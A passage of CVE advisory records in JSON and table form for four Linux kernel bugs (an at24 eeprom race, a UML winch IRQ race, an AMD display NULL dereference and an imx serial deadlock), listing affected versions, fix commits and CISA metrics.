"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/misc/eeprom/at24.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c850f71fca09ea41800ed55905980063d17e01da",
"status": "affected",
"version": "b20eb4c1f0261eebe6e1b9221c0d6e4048837778",
"versionType": "git"
},
{
"lessThan": "26d32bec4c6d255a03762f33c637bfa3718be15a",
"status": "affected",
"version": "b20eb4c1f0261eebe6e1b9221c0d6e4048837778",
"versionType": "git"
},
{
"lessThan": "c43e5028f5a35331eb25017f5ff6cc21735005c6",
"status": "affected",
"version": "b20eb4c1f0261eebe6e1b9221c0d6e4048837778",
"versionType": "git"
},
{
"lessThan": "2af84c46b9b8f2d6c0f88d09ee5c849ae1734676",
"status": "affected",
"version": "b20eb4c1f0261eebe6e1b9221c0d6e4048837778",
"versionType": "git"
},
{
"lessThan": "6d8b56ec0c8f30d5657382f47344a32569f7a9bc",
"status": "affected",
"version": "b20eb4c1f0261eebe6e1b9221c0d6e4048837778",
"versionType": "git"
},
{
"lessThan": "f42c97027fb75776e2e9358d16bf4a99aeb04cf2",
"status": "affected",
"version": "b20eb4c1f0261eebe6e1b9221c0d6e4048837778",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/misc/eeprom/at24.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\neeprom: at24: fix memory corruption race condition\n\nIf the eeprom is not accessible, an nvmem device will be registered, the\nread will fail, and the device will be torn down. If another driver\naccesses the nvmem device after the teardown, it will reference\ninvalid memory.\n\nMove the failure point before registering the nvmem device."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:46.323Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c850f71fca09ea41800ed55905980063d17e01da"
},
{
"url": "https://git.kernel.org/stable/c/26d32bec4c6d255a03762f33c637bfa3718be15a"
},
{
"url": "https://git.kernel.org/stable/c/c43e5028f5a35331eb25017f5ff6cc21735005c6"
},
{
"url": "https://git.kernel.org/stable/c/2af84c46b9b8f2d6c0f88d09ee5c849ae1734676"
},
{
"url": "https://git.kernel.org/stable/c/6d8b56ec0c8f30d5657382f47344a32569f7a9bc"
},
{
"url": "https://git.kernel.org/stable/c/f42c97027fb75776e2e9358d16bf4a99aeb04cf2"
}
],
"title": "eeprom: at24: fix memory corruption race condition",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35848",
"datePublished": "2024-05-17T14:47:26.828Z",
"dateReserved": "2024-05-17T13:50:33.105Z",
"dateUpdated": "2025-05-04T09:06:46.323Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-39292 (GCVE-0-2024-39292)
Vulnerability from cvelistv5
Published
2024-06-24 13:52
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
um: Add winch to winch_handlers before registering winch IRQ
Registering a winch IRQ is racy, an interrupt may occur before the winch is
added to the winch_handlers list.
If that happens, register_winch_irq() adds to that list a winch that is
scheduled to be (or has already been) freed, causing a panic later in
winch_cleanup().
Avoid the race by adding the winch to the winch_handlers list before
registering the IRQ, and rolling back if um_request_irq() fails.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 Version: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-39292",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-24T15:15:10.639136Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T15:15:20.044Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:58.690Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66ea9a7c6824821476914bed21a476cd20094f33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/351d1a64544944b44732f6a64ed65573b00b9e14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31960d991e43c8d6dc07245f19fc13398e90ead2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c02d425a2fbe52643a5859a779db0329e7dddd4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/434a06c38ee1217a8baa0dd7c37cc85d50138fb0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/73b8e21f76c7dda4905655d2e2c17dc5a73b87f1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0fbbd36c156b9f7b2276871d499c9943dfe5101"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/um/drivers/line.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "66ea9a7c6824821476914bed21a476cd20094f33",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "351d1a64544944b44732f6a64ed65573b00b9e14",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "31960d991e43c8d6dc07245f19fc13398e90ead2",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "0c02d425a2fbe52643a5859a779db0329e7dddd4",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "434a06c38ee1217a8baa0dd7c37cc85d50138fb0",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "73b8e21f76c7dda4905655d2e2c17dc5a73b87f1",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
},
{
"lessThan": "a0fbbd36c156b9f7b2276871d499c9943dfe5101",
"status": "affected",
"version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/um/drivers/line.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.23"
},
{
"lessThan": "2.6.23",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.23",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\num: Add winch to winch_handlers before registering winch IRQ\n\nRegistering a winch IRQ is racy, an interrupt may occur before the winch is\nadded to the winch_handlers list.\n\nIf that happens, register_winch_irq() adds to that list a winch that is\nscheduled to be (or has already been) freed, causing a panic later in\nwinch_cleanup().\n\nAvoid the race by adding the winch to the winch_handlers list before\nregistering the IRQ, and rolling back if um_request_irq() fails."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:16:11.229Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/66ea9a7c6824821476914bed21a476cd20094f33"
},
{
"url": "https://git.kernel.org/stable/c/dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0"
},
{
"url": "https://git.kernel.org/stable/c/351d1a64544944b44732f6a64ed65573b00b9e14"
},
{
"url": "https://git.kernel.org/stable/c/31960d991e43c8d6dc07245f19fc13398e90ead2"
},
{
"url": "https://git.kernel.org/stable/c/0c02d425a2fbe52643a5859a779db0329e7dddd4"
},
{
"url": "https://git.kernel.org/stable/c/434a06c38ee1217a8baa0dd7c37cc85d50138fb0"
},
{
"url": "https://git.kernel.org/stable/c/73b8e21f76c7dda4905655d2e2c17dc5a73b87f1"
},
{
"url": "https://git.kernel.org/stable/c/a0fbbd36c156b9f7b2276871d499c9943dfe5101"
}
],
"title": "um: Add winch to winch_handlers before registering winch IRQ",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-39292",
"datePublished": "2024-06-24T13:52:26.769Z",
"dateReserved": "2024-06-21T11:16:40.627Z",
"dateUpdated": "2025-11-04T17:21:58.690Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27044 (GCVE-0-2024-27044)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix potential NULL pointer dereferences in 'dcn10_set_output_transfer_func()'
The 'stream' pointer is used in dcn10_set_output_transfer_func() before
the check if 'stream' is NULL.
Fixes the below:
drivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn10/dcn10_hwseq.c:1892 dcn10_set_output_transfer_func() warn: variable dereferenced before check 'stream' (see line 1875)
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a Version: ddef02de0d71d483ad4398393717cc0d53fc990a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27044",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T13:38:17.735678Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:49.219Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:06.019Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e019d87e02f1e539ae48b99187f253847744ca7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/330caa061af53ea6d287d7c43d0703714e510e08"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ac7c7a3a9ab57aba0fe78ecb922d2b20e16efeb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29fde8895b2fcc33f44aea28c644ce2d9b62f9e0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2d9fe7787af01188dc470a649bdbb842d6511fd7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14613d52bc7fc180df6d2c65ba65fc921fc1dda7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7874ab3105ca4657102fee1cc14b0af70883c484"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ccfe80d022df7c595f1925afb31de2232900656"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/hwss/dcn10/dcn10_hwseq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e019d87e02f1e539ae48b99187f253847744ca7a",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "330caa061af53ea6d287d7c43d0703714e510e08",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "6ac7c7a3a9ab57aba0fe78ecb922d2b20e16efeb",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "29fde8895b2fcc33f44aea28c644ce2d9b62f9e0",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "2d9fe7787af01188dc470a649bdbb842d6511fd7",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "14613d52bc7fc180df6d2c65ba65fc921fc1dda7",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "7874ab3105ca4657102fee1cc14b0af70883c484",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
},
{
"lessThan": "9ccfe80d022df7c595f1925afb31de2232900656",
"status": "affected",
"version": "ddef02de0d71d483ad4398393717cc0d53fc990a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/hwss/dcn10/dcn10_hwseq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix potential NULL pointer dereferences in \u0027dcn10_set_output_transfer_func()\u0027\n\nThe \u0027stream\u0027 pointer is used in dcn10_set_output_transfer_func() before\nthe check if \u0027stream\u0027 is NULL.\n\nFixes the below:\ndrivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn10/dcn10_hwseq.c:1892 dcn10_set_output_transfer_func() warn: variable dereferenced before check \u0027stream\u0027 (see line 1875)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:59.495Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e019d87e02f1e539ae48b99187f253847744ca7a"
},
{
"url": "https://git.kernel.org/stable/c/330caa061af53ea6d287d7c43d0703714e510e08"
},
{
"url": "https://git.kernel.org/stable/c/6ac7c7a3a9ab57aba0fe78ecb922d2b20e16efeb"
},
{
"url": "https://git.kernel.org/stable/c/29fde8895b2fcc33f44aea28c644ce2d9b62f9e0"
},
{
"url": "https://git.kernel.org/stable/c/2d9fe7787af01188dc470a649bdbb842d6511fd7"
},
{
"url": "https://git.kernel.org/stable/c/14613d52bc7fc180df6d2c65ba65fc921fc1dda7"
},
{
"url": "https://git.kernel.org/stable/c/7874ab3105ca4657102fee1cc14b0af70883c484"
},
{
"url": "https://git.kernel.org/stable/c/9ccfe80d022df7c595f1925afb31de2232900656"
}
],
"title": "drm/amd/display: Fix potential NULL pointer dereferences in \u0027dcn10_set_output_transfer_func()\u0027",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27044",
"datePublished": "2024-05-01T12:54:14.695Z",
"dateReserved": "2024-02-19T14:20:24.213Z",
"dateUpdated": "2025-05-04T09:02:59.495Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52456 (GCVE-0-2023-52456)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: imx: fix tx statemachine deadlock
When using the serial port as RS485 port, the tx statemachine is used to
control the RTS pin to drive the RS485 transceiver TX_EN pin. When the
TTY port is closed in the middle of a transmission (for instance during
userland application crash), imx_uart_shutdown disables the interface
and disables the Transmission Complete interrupt. afer that,
imx_uart_stop_tx bails on an incomplete transmission, to be retriggered
by the TC interrupt. This interrupt is disabled and therefore the tx
statemachine never transitions out of SEND. The statemachine is in
deadlock now, and the TX_EN remains low, making the interface useless.
imx_uart_stop_tx now checks for incomplete transmission AND whether TC
interrupts are enabled before bailing to be retriggered. This makes sure
the state machine handling is reached, and is properly set to
WAIT_AFTER_SEND.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cb1a609236096c278ecbfb7be678a693a70283f1 Version: cb1a609236096c278ecbfb7be678a693a70283f1 Version: cb1a609236096c278ecbfb7be678a693a70283f1 Version: cb1a609236096c278ecbfb7be678a693a70283f1 Version: cb1a609236096c278ecbfb7be678a693a70283f1 Version: cb1a609236096c278ecbfb7be678a693a70283f1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52456",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-23T17:01:14.114676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:14.564Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.652Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e04a9d30509fb53ba6df5d655ed61d607a7cfda"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff168d4fdb0e1ba35fb413a749b3d6cce918ec19"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/63ee7be01a3f7d28b1ea8b8d7944f12bb7b0ed06"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/763cd68746317b5d746dc2649a3295c1efb41181"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a662d06c22ddfa371958c2071dc350436be802b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/78d60dae9a0c9f09aa3d6477c94047df2fe6f7b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/imx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6e04a9d30509fb53ba6df5d655ed61d607a7cfda",
"status": "affected",
"version": "cb1a609236096c278ecbfb7be678a693a70283f1",
"versionType": "git"
},
{
"lessThan": "ff168d4fdb0e1ba35fb413a749b3d6cce918ec19",
"status": "affected",
"version": "cb1a609236096c278ecbfb7be678a693a70283f1",
"versionType": "git"
},
{
"lessThan": "63ee7be01a3f7d28b1ea8b8d7944f12bb7b0ed06",
"status": "affected",
"version": "cb1a609236096c278ecbfb7be678a693a70283f1",
"versionType": "git"
},
{
"lessThan": "763cd68746317b5d746dc2649a3295c1efb41181",
"status": "affected",
"version": "cb1a609236096c278ecbfb7be678a693a70283f1",
"versionType": "git"
},
{
"lessThan": "9a662d06c22ddfa371958c2071dc350436be802b",
"status": "affected",
"version": "cb1a609236096c278ecbfb7be678a693a70283f1",
"versionType": "git"
},
{
"lessThan": "78d60dae9a0c9f09aa3d6477c94047df2fe6f7b0",
"status": "affected",
"version": "cb1a609236096c278ecbfb7be678a693a70283f1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/imx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
